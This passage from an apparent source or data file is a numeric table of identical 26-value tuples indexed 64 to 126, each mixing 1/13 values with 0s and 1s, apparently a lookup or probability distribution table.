(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 64
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 65
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 66
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 67
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 68
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 69
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 70
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 71
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 72
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 73
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 74
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 75
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 76
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 77
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 78
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 79
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 80
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 81
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 82
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 83
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 84
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 85
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 86
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 87
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 88
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 89
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 90
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 91
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 92
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 93
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 94
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 95
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 96
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 97
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 98
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 99
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 100
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 101
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 102
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 103
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 104
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 105
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 106
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 107
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 108
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 109
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 110
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 111
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 112
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 113
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 114
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 115
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 116
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 117
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 118
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 119
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 120
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 121
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 122
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 123
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 124
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 125
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 126
